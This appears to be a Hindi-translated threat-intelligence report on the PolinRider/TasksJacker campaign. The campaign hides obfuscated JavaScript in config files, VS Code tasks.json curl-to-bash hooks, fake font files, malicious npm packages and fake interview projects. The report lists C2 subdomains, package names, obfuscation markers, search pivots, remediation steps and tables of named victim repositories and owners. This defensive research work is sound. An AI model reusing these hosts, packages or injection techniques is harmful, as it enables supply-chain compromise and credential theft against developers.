Lithira-Silva | उपयोगकर्ता | 2 | 0 | 1 | client/postcss.config.mjs | TrueClaim — SLIIT (वर्ष 3, सेमेस्टर 2) में ITPM परियोजना के रूप में विकसित एक स्मार्ट दावा प्रबंधन प्रणाली। बीमा दावा प्रक्रिया को सटीकता और दक्षता के साथ सुव्यवस्थित और स्वचालित करने के लिए MERN स्टैक के साथ निर्मित। | | | 113 | maaz-bin-hassan/sahoolat-web-new | maaz-bin-hassan | उपयोगकर्ता | 2 | 0 | 1 | postcss.config.mjs | | | | 114 | Pramadu2001/ITPM_MODUS | Pramadu2001 | उपयोगकर्ता | 0 | 1 | 1 | my-app/postcss.config.mjs | 3rd वर्ष 2nd सेमेस्टर सूचना और प्रौद्योगिकी परियोजना प्रबंधन परियोजना जो MODUS लर्निंग प्लेटफ़ॉर्म है | | | 115 | abimtad/upload_file | abimtad | उपयोगकर्ता | 0 | 1 | 1 | postcss.config.mjs | | | | 116 | anilgoswamistartbitsolutions/travel-platform | anilgoswamistartbitsolutions | उपयोगकर्ता | 0 | 1 | 3 | sites/holidaydeals/postcss.config.mjs | travel_template/package/postcss.config.mjs | travel_template/old/postcss.config.mjs | | | | 117 | AhsanalyOfficial/ahsan_portfolio | AhsanalyOfficial | उपयोगकर्ता | 0 | 1 | 1 | postcss.config.mjs | | | | 118 | HevenDev/rmw-new-design | HevenDev | उपयोगकर्ता | 0 | 1 | 1 | postcss.config.mjs | | | | 119 | anilgoswamistartbitsolutions/travel-payload-sites | anilgoswamistartbitsolutions | उपयोगकर्ता | 0 | 1 | 2 | sites/holidaydeals/postcss.config.mjs | sites/luxurytravels/postcss.config.mjs | | | | 120 | dhruvmalik007/solana-colossum-hackathon | dhruvmalik007 | उपयोगकर्ता | 0 | 1 | 2 | apps/web/postcss.config.mjs | packages/ui/postcss.config.mjs | सतत निवेश पोर्टफोलियो के लिए विषयगत निवेश प्लेटफ़ॉर्म के लिए एक भविष्यवाणी बाज़ार बनाना | | | 121 | Tiewasters99/AI_Law_Wizard | Tiewasters99 | उपयोगकर्ता | 0 | 1 | 1 | postcss.config.mjs | | | | 122 | coderkhalide/scalping-trading-tools | coderkhalide | उपयोगकर्ता | 0 | 1 | 1 | postcss.config.mjs | भारित कारकों, व्यक्तिगत कारक ग्रेडिंग, बोनस अंक और अक्षर ग्रेड के साथ अपने ट्रेडिंग प्रविष्टियों को कॉन्फ़िगर करें और ग्रेड करें | | | 123 | monazahmed/Agrismart-project- | monazahmed | उपयोगकर्ता | 0 | 1 | 1 | postcss.config.mjs | | | | 124 | Gowreesh-VT/SherlockIT | Gowreesh-VT | उपयोगकर्ता | 0 | 1 | 1 | postcss.config.mjs | | | | 125 | webprogramminghack/b3-practice-30 | webprogramminghack | उपयोगकर्ता | 0 | 1 | 1 | postcss.config.mjs | | | | 126 | Salman1205/Mail-Assist-CRM | Salman1205 | उपयोगकर्ता | 2 | 0 | 1 | postcss.config.mjs | | | | 127 | AbdulwahidHusein/Shipper-chat | AbdulwahidHusein | उपयोगकर्ता | 2 | 0 | 1 | frontend/postcss.config.mjs | | | | 128 | michelzappy/zappy-scratch-091225 | michelzappy | उपयोगकर्ता | 0 | 1 | 1 | frontend/tailwind.config.js | | | | 129 | Ali-Hamas/Learn_Hub | Ali-Hamas | उपयोगकर्ता | 0 | 1 | 1 | frontend/tailwind.config.js | LearnHub - FastAPI, React, MongoDB, Stripe भुगतान और AI ट्यूटर के साथ मल्टी-इंस्ट्रक्टर लर्निंग प्लेटफ़ॉर्म | | | 130 | VALENSAPP/coin_backend | VALENSAPP | उपयोगकर्ता | 0 | 1 | 1 | eslint.config.mjs | बैकएंड रिपॉजिटरी। | | | 131 | QaisarWaheed/Aluminum-POS | QaisarWaheed | उपयोगकर्ता | 0 | 1 | 1 | eslint.config.mjs | | | | 132 | Abdulbasit219/UPSkaleAI | Abdulbasit219 | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | UP SKale AI छात्रों (सीखने वाले) और (कमाने वाले) के लिए ऐप (FYP परियोजना) | | | 133 | Satyam3002/nextauth | Satyam3002 | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | | | | 134 | ahmadraza382/Hospital-management-system | ahmadraza382 | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | | | | 135 | AKDebug-UX/challengePR | AKDebug-UX | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | | | | 136 | Ruwanima/ella-south-star-frontend | Ruwanima | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | | | | 137 | ahmadraza382/Luxeurs-Shopping-Store | ahmadraza382 | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | | | | 138 | ahmadraza382/Portfolio | ahmadraza382 | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | | | | 139 | Ayesha-Siddiqui1234/katy-youth-hackathon-2025-dev-post- | Ayesha-Siddiqui1234 | उपयोगकर्ता | 1 | 0 | 1 | frontend/postcss.config.mjs | हमारी टीम ने katy youth hackathon 2025 में भाग लिया और हम एक पूरी तरह कार्यात्मक वेबसाइट बना रहे हैं जिसमें एकीकृत चैटबॉट है जो करियर काउंसलर की तरह होगा जो छात्रों को उनके करियर पथ के लिए मार्गदर्शन करेगा | | | 140 | WimpyvL/Zappy-Health-Dashboard | WimpyvL | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | | | | 141 | ifedolapoomoniyi/fleet-robotics | ifedolapoomoniyi | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | | | | 142 | muhammad-tahir-sultan/rehman-fyp-nextjs-multivendor | muhammad-tahir-sultan | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | | | | 143 | vkrms/wizard | vkrms | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | react मल्टी-स्टेप फॉर्म ट्रेनिंग प्रोजेक्ट | | | 144 | Atik203/VocabPrep | Atik203 | उपयोगकर्ता | 1 | 0 | 1 | frontend/postcss.config.mjs | एक आधुनिक, केंद्रित वेब एप्लिकेशन जो इंटरैक्टिव लर्निंग, अभ्यास सत्र और प्रगति ट्रैकिंग के माध्यम से अंग्रेजी शब्दावली बनाने और मास्टर करने में मदद करता है। | | | 145 | web-ghoul/Portfolio | web-ghoul | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | इसमें मेरी परियोजनाएं, मेरे अनुभव, मेरे प्रमाण पत्र, मेरा संपर्क शामिल है। | | | 146 | AbdulwahidHusein/ai-tools-directory | AbdulwahidHusein | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | | | | 147 | AhmadRazaKhokhar1/resturants-app | AhmadRazaKhokhar1 | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | | | | 148 | ishivamgaur/Ap-news-next-js | ishivamgaur | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | AP News एक Next.js-आधारित समाचार एप्लिकेशन है जो राजनीति, खेल, प्रौद्योगिकी, मनोरंजन और लाइव अपडेट जैसी श्रेणीबद्ध समाचार सामग्री तेज प्रदर्शन, SEO अनुकूलन और सर्वर-साइड रेंडरिंग के साथ प्रदान करता है। | | | 149 | amMubbasher/cleannami.ceenami-old | amMubbasher | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | | | | 150 | AbdulwahidHusein/crawler-dashboard | AbdulwahidHusein | उपयोगकर्ता | 1 | 0 | 1 | postcss.config.mjs | | | | 151 | SouravDn-p/RexAuction | SouravDn-p | उपयोगकर्ता | 1 | 0 | 1 | tailwind.config.js | लाइव बोली लगाने के अनुभवों के लिए बनाया गया एक रीयल-टाइम नीलामी वेब एप्लिकेशन, जिसमें तत्काल अपडेट, स्मार्ट बिडिंग और उपयोगकर्ताओं के बीच रीयल-टाइम संचार जैसी उन्नत सुविधाएं शामिल हैं। | | | 152 | AKDebug-UX/interactive-tv-app | AKDebug-UX | उपयोगकर्ता | 1 | 0 | 1 | tailwind.config.js | | | | 153 | usman-174/VidSpark | usman-174 | उपयोगकर्ता | 1 | 0 | 1 | client/tailwind.config.js | | | | 154 | NatyJoseDie/proyecto-nginx | NatyJoseDie | उपयोगकर्ता | 1 | 0 | 1 | eslint.config.mjs | | | | 155 | AKDebug-UX/DoneWithIt | AKDebug-UX | उपयोगकर्ता | 1 | 0 | 1 | App.js | | | | 156 | dhruvmalik007/forensics-board | dhruvmalik007 | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 157 | Rahulkumarhavit/ProStore-Ecommerce | Rahulkumarhavit | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 158 | Bart3kL/shopify-components | Bart3kL | उपयोगकर्ता | 0 | 0 | 1 | polaris-components/postcss.config.mjs | | | | 159 | mjatin-dev/logic-zephyr | mjatin-dev | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 160 | umrasghar/heygen-demo | umrasghar | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 161 | thanhdanh111/challenge | thanhdanh111 | उपयोगकर्ता | 0 | 0 | 2 | Problem-2/postcss.config.mjs | Problem-3/postcss.config.mjs | | | | 162 | hamza-nafasat/rentin-frontend | hamza-nafasat | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 163 | rejoan121615/ClientOps | rejoan121615 | उपयोगकर्ता | 0 | 0 | 1 | frontend/postcss.config.mjs | ClientOps एक फुल-स्टैक आंतरिक संचालन डैशबोर्ड है जो एजेंसियों और छोटे व्यवसायों के लिए ग्राहकों, परियोजनाओं, टीम के सदस्यों और वर्कफ़्लो को सुरक्षित रूप से प्रबंधित करने के लिए डिज़ाइन किया गया है। | | | 164 | SouravDn-p/CMR | SouravDn-p | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 165 | EmanDeveloper/EasyTech | EmanDeveloper | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 166 | addis-ale/25-5-clock | addis-ale | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 167 | MSCPerera/Job-Board-App | MSCPerera | उपयोगकर्ता | 0 | 0 | 1 | job-board-app/postcss.config.mjs | | | | 168 | Nathanim1919/nextjs-project | Nathanim1919 | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 169 | TimothyBabatu13/AegisHealth-Smart | TimothyBabatu13 | उपयोगकर्ता | 0 | 0 | 1 | aegis-health-smart/postcss.config.mjs | | | | 170 | Senti-fi/Senti.fi | Senti-fi | उपयोगकर्ता | 0 | 0 | 1 | frontend/postcss.config.mjs | | | | 171 | Zentaurios/stable-monitor | Zentaurios | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 172 | SouravDn-p/Frontend-task | SouravDn-p | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 173 | Storaboy11/meerge | Storaboy11 | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 174 | ahmedghonim/esraa | ahmedghonim | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 175 | vrunda310/AIA-VEGA-Frontend | vrunda310 | उपयोगकर्ता | 0 | 0 | 1 | frontend/postcss.config.mjs | | | | 176 | emmanueldavidson96/popular_saas_product_landing_page | emmanueldavidson96 | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 177 | pratikp72/deal-Project | pratikp72 | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 178 | Al-amin07/file_sure | Al-amin07 | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 179 | waris-ansar/finstar | waris-ansar | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 180 | MianHaziq/LKnight-Lms | MianHaziq | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 181 | pankajkhadse/TrustBasket | pankajkhadse | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 182 | adnaan-2/content-generation | adnaan-2 | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 183 | malikjunaidhassann/seller-panel | malikjunaidhassann | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 184 | mdnuruzzamannirob/your-capture-awards-dashboard | mdnuruzzamannirob | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 185 | Minahil48/NY-caffine | Minahil48 | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | आपकी सभी लालसाएं एक जगह | | | 186 | FrazKhan1/dev-team-chat | FrazKhan1 | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 187 | jrioscloud/financial-document-analyzer | jrioscloud | उपयोगकर्ता | 0 | 0 | 1 | frontend/postcss.config.mjs | | | | 188 | seemab-ahmed/rodopi | seemab-ahmed | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 189 | JudeTejada/digital-pods | JudeTejada | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 190 | msuhels/RapidProject-Pos-System | msuhels | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 191 | Al-amin07/project_5_frontend | Al-amin07 | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 192 | abdullah2310ishaq/afronaut | abdullah2310ishaq | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 193 | Jaskaran2701/Test-1 | Jaskaran2701 | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 194 | Deepanshu7-bit/nugen-interns | Deepanshu7-bit | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 195 | saifullah-max/bublr | saifullah-max | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 196 | Meet2054/automa8x-production-new | Meet2054 | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | |


Read more

टूल डाउनलोड करें
मीट्रिक8 मार्च (प्रारंभिक)11 अप्रैल (नवीनतम)Δ
अद्वितीय संक्रमित रिपॉजिटरी6751,951+1,276
प्रभावित अद्वितीय मालिक3521,047+695
— व्यक्तिगत उपयोगकर्ता305~930+625
— संगठन47~117+70
देखे गए विशिष्ट ऑबफस्केटर वेरिएंट1 (rmcej%otb%)2 (rmcej%otb% + Cot%3t=shtP)+1
पुष्टि किए गए विशिष्ट इंजेक्शन वेक्टर1 (config file)4 (config file, .vscode/tasks.json, fake .woff2 font, malicious npm dep)+3
दस्तावेजित विशिष्ट C2 उपडोमेन1 (260120.vercel.app)6+ (देखें C2 Infrastructure)+5
ज्ञात हथियारीकृत टेक-होम टेम्पलेट02+ (ShoeVista, StakingGame)+2
rmcej_otb_payload
नया वेरिएंट: Cot%3t=shtP
  • खतरा अभिनेता पहले के पीड़ितों को फिर से संक्रमित कर रहा है। कम से कम एक पीड़ित रिपॉजिटरी (HassanHabibTahir/testclient) में अलग-अलग फ़ाइलों में दोनों वेरिएंट से मार्कर हैं, जो दर्शाता है कि अभिनेता के उपकरण पहले से समझौता किए गए होस्ट के खिलाफ फिर से चल रहे हैं और नए ऑबफस्केटर को इंजेक्ट कर रहे हैं।

  • PolinRider और TasksJacker ने परिचालन रूप से विलय कर लिया है। अब हमारे पास प्रत्यक्ष सबूत है कि एक ही खतरा अभिनेता एक ही पीड़ित आबादी के खिलाफ कॉन्फिग-फ़ाइल इंजेक्शन और .vscode/tasks.json curl-to-shell संक्रमण वेक्टर दोनों चला रहा है। 101 temp_auto_push.bat प्रसार-स्क्रिप्ट पीड़ितों में से 22 के पास दुर्भावनापूर्ण .vscode/tasks.json फ़ाइलें भी हैं, और कई हथियारीकृत टेक-होम / फर्जी-इंटरव्यू टेम्पलेट प्रोजेक्ट की पहचान की गई है — नीचे हथियारीकृत टेक-होम टेम्पलेट देखें। OSM आगे बढ़ते हुए दो क्लस्टर को #polinrider के तहत समेकित कर रहा है।

  • दो हथियारीकृत टेक-होम टेस्ट प्रोजेक्ट की पहचान की गई: ShoeVista (एक नकली Tailwind ई-कॉमर्स मूल्यांकन जो client/package.json में दुर्भावनापूर्ण tailwindcss-style-animate ^1.1.6 के साथ आता है) और StakingGame (एक नकली ब्लॉकचेन / VS Code ऑटोमेशन प्रोजेक्ट जिसकी पहचान tasks.json में UUID e9b53a7c-2342-4b15-b02d-bd8b8f6a03f9 द्वारा की गई है)। कम से कम 46 + 42 डेवलपर्स ने इन परीक्षणों का प्रयास किया और समझौता किए गए। Contagious Interview लूर प्लेबुक का हिस्सा।

  • पांच नए C2 उपडोमेन खोजे गए जो .vscode/tasks.json curl | bash पेलोड में उपयोग किए जा रहे हैं, सभी Vercel पर होस्ट किए गए हैं:

    • default-configuration.vercel.app (सबसे अधिक उपयोग, ~106 पीड़ित संदर्भ)
    • vscode-settings-bootstrap.vercel.app
    • vscode-settings-config.vercel.app
    • vscode-bootstrapper.vercel.app
    • vscode-load-config.vercel.app

    सभी पैटर्न https://<sub>.vercel.app/settings/(mac|linux|win)?flag=<N> का अनुसरण करते हैं। C2 Infrastructure अनुभाग में जोड़ा गया।

  • OSM ने इस दो-दिवसीय शिकार में 821 नई खतरे की रिपोर्ट प्रस्तुत की, जिससे कुल OSM PolinRider प्रविष्टियाँ ~1,700 हो गईं। 821 सबमिशन का वेरिएंट ब्रेकडाउन: 591 मूल वेरिएंट (rmcej%otb%), 113 केवल-प्रसार (temp_auto_push.bat), 45 malicious_npm (ShoeVista/devhire क्लस्टर), 27 tasksjacker, 1 नया वेरिएंट (Cot%3t=shtP), 44 अन्य।

  • नए उच्च-उपज खोज पिवट्स की पहचान की गई जो JS पेलोड साफ हो जाने पर भी पीड़ितों को ढूंढते हैं। सबसे मजबूत हैं filename:temp_auto_push.bat (101 पुष्टि-दुर्भावनापूर्ण परिणाम, 100% सही-सकारात्मक दर) और "default-configuration.vercel.app" (106 हिट)। 44 यादृच्छिक सत्यापनों में नमूना झूठी-सकारात्मक दर 0% थी। नीचे रिफाइनमेंट कार्यप्रणाली देखें।

  • एक नए इंजेक्शन वेक्टर की पुष्टि की गई: कम से कम एक पीड़ित (AgbaD/odoo) में .woff2 फ़ॉन्ट फ़ाइल (public/fonts/fa-solid-400.woff2) में छिपा हुआ अस्पष्ट JS पेलोड है जो Node के माध्यम से निष्पादित होता है — यह पुष्टि करता है कि अभियान एक ही लक्ष्य के खिलाफ कई इंजेक्शन वेक्टर का उपयोग करता है।

  • कोई तीसरा ऑबफस्केटर वेरिएंट नहीं मिला। global['?'] मार्करों, सीड संयोजनों, संरचनात्मक पैटर्न, IOC शाब्दिक, और अनुक्रमिक '8-stN' टैग 1–200 (Sourcegraph regex के माध्यम से) की संपूर्ण जांच ने पहले से दस्तावेजित दो से परे तीसरे वेरिएंट का कोई सबूत नहीं दिया। अभिनेता का नया-वेरिएंट बैच 8-st1..8-st59 पर सीमित है (Sourcegraph के इंडेक्स से 21 अनुक्रमिक संख्याएं गायब हैं)।

  • रेपो रूट पर प्रसार-स्क्रिप्ट आर्टिफैक्ट temp_auto_push.bat और .gitignore से संदर्भित किसी भी config.bat की तलाश करें। भले ही अस्पष्ट JS पेलोड को साफ कर दिया गया हो, यह फ़ाइल पिछले समझौते का प्रत्यक्ष प्रमाण है और इसे क्रेडेंशियल रोटेशन को ट्रिगर करना चाहिए।
  • public/, static/, assets/ में बाइनरी एसेट्स की जाँच करें कि कहीं अनपेक्षित .woff / .woff2 फ़ाइलें तो नहीं हैं — मैलवेयर को नकली फ़ॉन्ट फ़ाइलों (the "fake-font" sub-variant) के अंदर पेलोड छिपाते हुए देखा गया है।
  • package.json निर्भरताओं की समीक्षा करें — विशेष रूप से हाल ही में जोड़े या अपडेट किए गए कोई भी PostCSS/Tailwind-संबंधित पैकेज जैसे tailwind-mainanimation, tailwind-autoanimation, और नीचे सूचीबद्ध अन्य npm पैकेज।
  • node_modules में पोस्टइंस्टॉल स्क्रिप्ट की जाँच करें: grep -r "postinstall" node_modules/*/package.json
  • किसी भी रहस्य, टोकन, या क्रेडेंशियल को घुमाएँ जो बिल्ड के दौरान वातावरण में मौजूद रहे हों।
  • स्वच्छ कॉन्फ़िग फ़ाइलों को फोर्स-पुश करें और भविष्य में कमिट पर हस्ताक्षर करने पर विचार करें।
  • यह न मानें कि पहले से साफ किया गया रेपो साफ रहेगा — OSM टीम ने कम से कम एक पीड़ित देखा है जो rmcej%otb% वेरिएंट की पिछली सफाई के बाद घुमाए गए Cot%3t=shtP वेरिएंट से पुन: संक्रमित हो गया था। समय-समय पर पुन: स्कैन करें।
  • फ़ाइलघटनाएँ (8 मार्च)घटनाएँ (10 अप्रैल)
    postcss.config.mjs416~960
    tailwind.config.js84~210
    eslint.config.mjs60~150
    postcss.config.js13~40
    App.js13~30
    next.config.mjs12~30
    index.js6~25
    astro.config.mjs6~15
    tailwind.config.mjs5~12
    vite.config.js / vite.config.mjs—~20
    webpack.config.js—~15
    gridsome.config.js—~5
    vue.config.js—~10
    truffle.js—~5
    temp_auto_push.bat (प्रसार स्क्रिप्ट कलाकृति)—101
    .woff2 फ़ॉन्ट फ़ाइलें (फ़ेक-फ़ॉन्ट उप-प्रकार)—देखा गया
    पैकेजनवीनतम संस्करणस्थितिप्रकाशकदेखे गए पीड़ितों की संख्या (11 अप्रैल)
    tailwindcss-style-animate1.1.6देखा गया(खाता हटा दिया गया)34 ← प्राथमिक ShoeVista निर्भरता
    tailwind-mainanimation2.3.3 → 0.0.1-securitynpm द्वारा हटा दिया गया (सुरक्षा प्लेसहोल्डर द्वारा प्रतिस्थापित 2026-03-13)allavin (खाता हटा दिया गया)1
    tailwind-autoanimation2.3.6रजिस्ट्री से हटा दिया गयाblackedward (खाता हटा दिया गया)2
    tailwind-animationbased—देखा गया(खाता हटा दिया गया)0
    tailwindcss-typography-style0.8.2देखा गया(खाता हटा दिया गया)6
    tailwindcss-style-modify0.8.3देखा गया(खाता हटा दिया गया)4
    tailwindcss-animate-style1.2.5देखा गया(खाता हटा दिया गया)0
    विशेषतामूल वेरिएंटनया वेरिएंट
    हस्ताक्षर मार्करrmcej%otb%Cot%3t=shtP
    शफल बीज (परत 1)28576871111436
    द्वितीयक बीज (परत 2)26676863896884
    डीकोडर फ़ंक्शन नाम_$_1e42MDy
    इंजेक्टेड ग्लोबलglobal['!'], global['r'], global['m']global['_V'], global['r'], global['m']
    लक्षित फ़ाइल प्रकारpostcss.config.mjs, tailwind.config.js, eslint.config.mjs, आदि।(समान)
    इंजेक्शन शैलीवैध export default / मॉड्यूल बॉडी के बाद जोड़ा गया(समान)
    ब्लॉकचेन C2TRON / Aptos / BSC(समान — पते अपरिवर्तित)
    XOR कुंजियाँअपरिवर्तितअपरिवर्तित
  • देखे गए पीड़ित रेपो: 34+ व्यक्तिगत डेवलपर रीअपलोड, सभी फरवरी-मार्च 2026 में बनाए गए, सभी 0 स्टार / 0 फ़ोर्क (ताज़ा डिस्पोजेबल खाते)। उदाहरण: alaminrifat/shoevista-rifat, Atik203/ShoeVista, DaviBarros/shoevista, IchaCoder/test-shoe, Anas-Ali-3673/Test-west-shoe, naime7132/client-2 (devhire वेरिएंट)
  • नामकरण पैटर्न: उम्मीदवार अक्सर रेपो का नाम फ़ेक-कंपनी प्रॉम्प्ट (ShoeVista, shoevista-rifat, HedaetShahriar/ShoeVista-Test) या साक्षात्कार प्लेटफ़ॉर्म (Test-002, test-shoe, test_upwork, test_west_shoe) के नाम पर रखते हैं
  • सबडोमेनगणना (11 अप्रैल)पहली बार देखा गयानोट्स
    260120.vercel.app56मार्च 8 से पहलेमूल OSM क्वेरी Q11; पहले ब्लॉग में भी प्रकाशित
    default-configuration.vercel.app106अप्रैल 2026अब तक का सबसे बड़ा एकल-सबडोमेन क्लस्टर
    vscode-settings-bootstrap.vercel.app16अप्रैल 2026
    vscode-settings-config.vercel.app11अप्रैल 2026
    vscode-bootstrapper.vercel.app6अप्रैल 2026
    vscode-load-config.vercel.app6अप्रैल 2026
    खोजा गया फ़ाइलनामपरिणाम
    postcss.config.mjs416
    tailwind.config.js84
    eslint.config.mjs60
    App.js13
    postcss.config.js13
    next.config.mjs12
    index.js6
    astro.config.mjs6
    अन्य कॉन्फ़िग फ़ाइलें81
    कुल (प्री-डिडुप)700
    अद्वितीय रिपॉजिटरी675
    #पिवटइंजनयोगदान किए गए अद्वितीय रिपॉजिटरी
    1filename:temp_auto_push.batGitHub Code Search101
    2"_$_1e42" (एक्सटेंशन/साइज़/फ़ोर्क परिशोधन के साथ)GitHub Code Search1,323
    3"function MDy(f)" global _VGitHub Code Search14
    4LAST_COMMIT_DATE LAST_COMMIT_TIME extension:batGitHub Code Search236
    5Cot%3t=shtP रेगेक्स fork:yes archived:yes के साथSourcegraph41
    राउंड 1 संयुक्त1,556
    6"<malicious_npm_package>" filename:package.json (7 npm पैकेज)GitHub Code Search46
    7<url> filename:tasks.json (vercel.app, onrender.com, 260120.vercel.app)GitHub Code Search145
    8"default-configuration.vercel.app" और 4 सहोदर vscode-*.vercel.app सबडोमेनGitHub Code Search94
    9"e9b53a7c-2342-4b15-b02d-bd8b8f6a03f9" (StakingGame टेम्पलेट UUID)GitHub Code Search42
    10अनुक्रमिक '8-stN' 1–200 गणना (अअनुक्रमित अनुक्रमिक टैग की जाँच)Sourcegraph regex0 नया
    राउंड 2 संयुक्त+215
    कुल अद्वितीय (दोनों राउंड + मौजूदा CSV)1,951
    परिशोधनtotal_count
    extension:js430
    extension:mjs676
    extension:cjs17
    extension:ts7
    extension:html1
    size:<50004
    size:5000..6000630
    size:6000..7000125
    size:7000..8000139
    size:8000..900056
    size:9000..1000036
    size:10000..50000112
    size:>5000012
    fork:true157 (डिफ़ॉल्ट रूप से बाहर रखा गया!)
    स्रोतअद्वितीय रिपॉजिटरीअद्वितीय स्वामी
    मूल मार्च 8 प्रकाशन675352
    affected_repos.csv (मार्च 18 अपडेट)769399
    अप्रैल 10 v3 मास्टर (5 पिवट)1,556835
    अप्रैल 11 राउंड 2 (5 अतिरिक्त पिवट)+215 नेट नया+158 नेट नया
    संघ (वास्तविक दायरा, अप्रैल 11)1,9511,047
    फ़ाइलविवरण
    README.mdयह रिपोर्ट
    polinrider-rides-again.mdफ़ॉलो-अप ब्लॉग (अप्रैल 11) जिसमें अभियान वृद्धि, TasksJacker / PolinRider विलय, और पूर्ण एंड-टू-एंड पेलोड रिवर्स इंजीनियरिंग शामिल है
    affected_repos.csvप्रभावित रिपॉजिटरी — पहले संगठन, फिर उपयोगकर्ता, प्रत्येक को सितारे+फ़ोर्क के अवरोही क्रम में क्रमबद्ध किया गया है। नोट: 2026-04-11 तक इस CSV में मार्च 18 संग्रह से 769 प्रविष्टियाँ हैं। अप्रैल 10–11 की खोजों ने ~1,180 नए रिपॉजिटरी जोड़े जो अभी तक इस CSV में विलय नहीं हुए हैं (वे reports/polinrider-master-v3-1556.tsv और reports/polinrider-round2-repos.txt में ट्रैक किए गए हैं)। वास्तविक ज्ञात दायरा 1,951 अद्वितीय रिपॉजिटरी है।
    affected_users.csvप्रभावित स्वामी — पहले संगठन, फिर उपयोगकर्ता, प्रत्येक को अनुयायियों के अवरोही क्रम में क्रमबद्ध किया गया है। 2026-04-11 तक इसमें 399 प्रविष्टियाँ हैं; अप्रैल खोज संघ में 1,047 स्वामी हैं।
    reports/polinrider-master-v3-1556.tsvअप्रैल 10 खोज मास्टर सूची: v3 खोज में पाए गए सभी 1,556 रिपॉजिटरी के लिए repo \t osm_status \t threat_id \t severity \t sources
    reports/polinrider-new-v3.tsvवे 705 रिपॉजिटरी जो 2026-04-10 को OSM में नए जोड़े गए
    reports/polinrider-round2-repos.txtराउंड 2 स्वच्छ मास्टर सूची (5 नए पिवट से 239 अद्वितीय रिपॉजिटरी)
    reports/polinrider-round2-submissions-2026-04-11.tsvवे 72 रिपॉजिटरी जो 2026-04-11 को OSM में नए जोड़े गए (राउंड 2)
    reports/polinrider-scope-v3-2026-04-10.mdपूर्ण v3 दायरा रिपोर्ट जिसमें परिशोधन पद्धति और गलत-सकारात्मक विश्लेषण शामिल है
    reports/polinrider-submissions-2026-04-10.md2026-04-10 को दायर 704 OSM खतरा रिपोर्टों के लिए सामूहिक सबमिशन रिपोर्ट
    reports/polinrider-scope-v3-2026-04-10.mdv3 दायरा रिपोर्ट
    रिपॉजिटरीसितारेफ़ोर्कसंक्रमित फ़ाइल
    Codechef-VITC-Student-Chapter/Club-Integration-and-Management-Platform611postcss.config.mjs
    Victorola-coder/tewo96tailwind.config.js
    Kreliannn/Document-Request-System-FRONTEND81postcss.config.mjs
    Atik203/Scholar-Flow44postcss.config.mjs
    sparktechagency/Vap-shop-Front-End-70postcss.config.mjs
    Kreliannn/PDF-To-Reviewer-Quiz-FRONTEND70postcss.config.mjs
    coderkhalide/Anti-Detect-Browser24tailwind.config.js
    tanushbhootra576/Bionary-Website-Challenge-and-final42tailwind.config.js
    tanushbhootra576/collegeConnect51postcss.config.mjs
    Kreliannn/commision_portfolio60postcss.config.mjs
    संगठनअनुयायीप्रभावित रिपॉजिटरी
    sparktechagency13012
    FSDTeam-SAA2112
    Softvence-Omega-Dev-Ninjas184
    Codechef-VITC-Student-Chapter171
    softvence-omega-future-stack114
    The-Extra-Project111
    etrainermis71
    tricodenetwork71
    Binary-Mindz61
    Gamage-Recruiters-40651
    उपयोगकर्ताअनुयायीप्रभावित रिपॉजिटरी
    coderkhalide3494
    finom1724
    Victorola-coder1211
    dhruvmalik007876
    saif72437572
    a-belard431
    Muhammadfaizanjanjua109391
    Nathanim1919385
    kanchana404333
    AKDebug-UX304
    https://github.com/Addis-Career/Frontend
    https://github.com/etrainermis/mineduc-Form
    https://github.com/FSDTeam-SAA/brazen-kits
